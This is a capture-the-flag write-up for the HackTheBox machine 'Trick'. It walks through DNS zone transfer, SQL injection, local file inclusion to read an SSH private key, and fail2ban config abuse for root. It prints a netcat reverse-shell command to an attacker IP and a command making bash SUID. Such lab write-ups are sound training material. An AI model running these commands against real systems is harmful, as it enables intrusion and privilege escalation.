CTF-Writeups/HackTheBox/Trick.md
2023-02-10 17:31:39 +03:00

181 lines
5.9 KiB
Markdown

# HackThBox - Trick
## NMAP
```bash
Nmap scan report for 10.129.85.201
Host is up (0.15s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_ 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http nginx 1.14.2
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## PORT 80 (HTTP)
On the web page we see a bootstrap template which has nothing intersting
<img src="https://i.imgur.com/MwFbM4d.png"/>
Fuzzing for files and directories it didn't found anything as well
<img src="https://i.imgur.com/kRQgYfD.png"/>
## PORT 53 (DNS)
Having dns service running we can try to see if we can query dns records or perform dns zone transfer for that we need a domain name, we can get the domain by performing a reverse dns lookup which resolve IP to domain name
https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns
`dig -x 10.10.11.166 @10.10.11.166`
<img src="https://i.imgur.com/ba3zxyv.png"/>
Having the `trick.htb` we can add this in hosts file
<img src="https://i.imgur.com/jDSYKGt.png"/>
Now to enumerate further we can perform the dns zone transfer
<img src="https://i.imgur.com/Z3rUXsY.png"/>
This shows `root.trick.htb` subdomain but it doesn't take us anywhere, on performing zone transfer with `axfr`
<img src="https://i.imgur.com/4GZ7DZL.png"/>
We get another domain name `preprod-payroll.trick.htb`, so let's add this in hosts file as well
<img src="https://i.imgur.com/b52rmd1.png"/>
Visting this subdomain, we'll get a login page on which we can try default credentials
<img src="https://i.imgur.com/s0rpUwi.png"/>
<img src="https://i.imgur.com/kxP8ZYp.png"/>
Which didn't worked, so next I tried sqli
<img src="https://i.imgur.com/scRFq1D.png"/>
That worked, so I tried running `sqlmap` but `time-based blind` so it's gonna take a lot of time in dumping the data
<img src="https://i.imgur.com/tyNa8sd.png"/>
## Foothold
Going back to the site we can see a GET parameter `page` fetching for pages, I tried to perform LFI on that parameter but it didn't worked
I tried running `wfuzz` against the parameter using LFI wordlist
<img src="https://i.imgur.com/WkDekCt.png"/>
<img src="https://i.imgur.com/Sqj5dRC.png"/>
Which didn't worked but the web app had sql injection in ton of places, on viewing employee details intercepting the request, we'll get a GET parameter `id` which also is vulnerable to sqli
<img src="https://i.imgur.com/yPxDULh.png"/>
<img src="https://i.imgur.com/0UaS1GK.png"/>
<img src="https://i.imgur.com/8HZLpuI.png"/>
It shows that it's boolean-blind as on the login page it was a time based sqli so with this we can perform LFI to read nginx vhost configuration file
<img src="https://i.imgur.com/tG0SIvk.png"/>
This shows another subdomain `preprod-marketing.trick.htb`
<img src="https://i.imgur.com/Khdf3CI.png"/>
Alternatively we can enumerate this subdomain by running wfuzz
<img src="https://i.imgur.com/7XJySOA.png"/>
<img src="https://i.imgur.com/cQwqVUW.png"/>
This loads up another site, having nothing special other than the same GET parameter, so I tried running LFI wordlist here as well
<img src="https://i.imgur.com/tFK97Q7.png"/>
<img src="https://i.imgur.com/qp24LsL.png"/>
This starts to give us some output on filterting the response
<img src="https://i.imgur.com/pVW4KjH.png"/>
We have the username `michael` , we can try to see if we can access his .ssh folder for `id_rsa`
<img src="https://i.imgur.com/KvmF2lj.png"/>
<img src="https://i.imgur.com/mfvA1DJ.png"/>
## Privilege Escalation
Running `sudo -l` to check if we can run with sudo privileges
<img src="https://i.imgur.com/JnQupEJ.png"/>
So we can restart the `fail2ban` service but we don't know exaclty what we need to edit, being in security group we can check what permissions this group has
<img src="https://i.imgur.com/mdqEqZn.png"/>
We have write access to this folder which has configuration files for fail2ban
<img src="https://i.imgur.com/KAxu3kE.png"/>
I found an article explaining how we can abuse fail2ban config file
https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7
For this we need to edit the `actionban` command in `iptables-multiport.conf`, so first let's copy this file in /tmp or other directory where we can edit it with a reverse shell
```bash
/usr/bin/nc 10.10.14.39 2222 -e /bin/bash
```
<img src="https://i.imgur.com/a7pYDLu.png"/>
After editing the config file, move it back to the action.d folder and restart fail2ban service
<img src="https://i.imgur.com/UVqiGM0.png"/>
Then start doing fail attempts on login, you'll get a reverse shell on your port
<img src="https://i.imgur.com/5XoSG2C.png"/>
But our reverse shell connection dies and the reason behind this is, the ban duration lasts for 10 seconds and bans the host after the 5th attempt
<img src="https://i.imgur.com/8dfOlrn.png"/>
Instead of getting a reverse shell we can just make bash a SUID with `chmod +s /bin/bash`
<img src="https://i.imgur.com/HJFuAxr.png"/>
Performing the invalid login attempts on ssh will trigger the fail2ban on the 5th invalid attempt
<img src="https://i.imgur.com/kw67ztg.png"/>
<img src="https://i.imgur.com/oqOCN4B.png"/>
## References
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns
- https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7